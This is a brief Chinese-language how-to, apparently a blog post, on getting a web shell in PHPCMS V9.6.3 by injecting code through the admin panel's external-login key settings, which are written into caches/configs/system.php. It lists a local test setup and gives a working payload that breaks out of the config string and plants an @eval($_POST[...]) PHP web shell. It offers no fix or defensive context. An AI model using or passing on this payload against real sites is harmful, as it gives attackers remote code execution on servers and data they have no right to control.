PHPCMS V9.6.3 后台配置文件getshell

彦祖 342

Part.1 环境

LOCALHOST
PHPSTUDY
NGINX
PHP5.3
mysql5.5
源码在源码之家下载的phpcmsV9.6.3 utf8

Part.2 过程

进入后台->基本设置->connect
以上不管是哪一个KEY设置的地方写入任意到配置文件中
找到\www\phpcms\caches\configs\system.php


'connect_enable' => '1',    //是否开启外部通行证
'sina_akey' => '',  //sina AKEY
'sina_skey' => '',  //sina SKEY

'snda_akey' => '',  //盛大通行证 akey
'snda_skey' => '',  //盛大通行证 skey

'qq_akey' => '',    //qq skey
'qq_skey' => '',    //qq skey

'qq_appkey' => '',  //QQ号码登录 appkey
'qq_appid' => '',   //QQ号码登录 appid
'qq_callback' => '',    //QQ号码登录 callback

'admin_url' => '',  //允许访问后台的域名

闭合插入

'snda_akey' => '\\',@@eval($_POST[1]),//',  //盛大通行证 akey
\',@@eval($_POST[123]),//

分享